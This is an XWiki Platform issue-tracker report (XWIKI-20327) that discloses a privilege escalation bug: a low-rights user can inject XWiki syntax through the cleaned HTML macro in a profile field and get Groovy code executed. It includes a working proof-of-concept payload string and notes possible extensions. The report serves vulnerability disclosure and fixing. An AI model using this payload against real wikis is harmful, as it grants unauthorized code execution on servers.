Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20327

Privilege escalation (PR) from account through XWiki syntax injection in cleaned HTML macro

    XMLWordPrintable

Details

    • Unit
    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      As a user without script or programming rights, edit the about section of your user profile and include

      {{html wiki="true"}}~{~{~/~h~t~m~l~}~}~ ~{~{~c~a~c~h~e~}~}~{~{~g~r~o~o~v~y~}~}~p~r~i~n~t~l~n~(~1~)~{~{~/~g~r~o~o~v~y~}~}~{~{~/~c~a~c~h~e~}~}~{{/html}}
      

      Expected result:

      The user profile is normally displayed with an error that Groovy couldn't be executed.

      Actual result:

      1</p>{{/html}}</dd>
      

      is displayed, followed by further raw HTML code, showing that the Groovy macro has been executed. This demonstrates a privilege escalation attack from account to programming rights. This attack is similar to XWIKI-20313 but instead of attacking UIX execution, this attacks the display of rich text properties. Note that with HTML comments, full unfiltered Groovy code could be introduced, but I assume that using features like GroovyShell#evaluate, further code could also be easily interpreted from a URL parameter without requiring characters that are lost due to the HTML sanitizer (didn't test).

      Attachments

        Issue Links

          Activity

            People

              MichaelHamann Michael Hamann
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: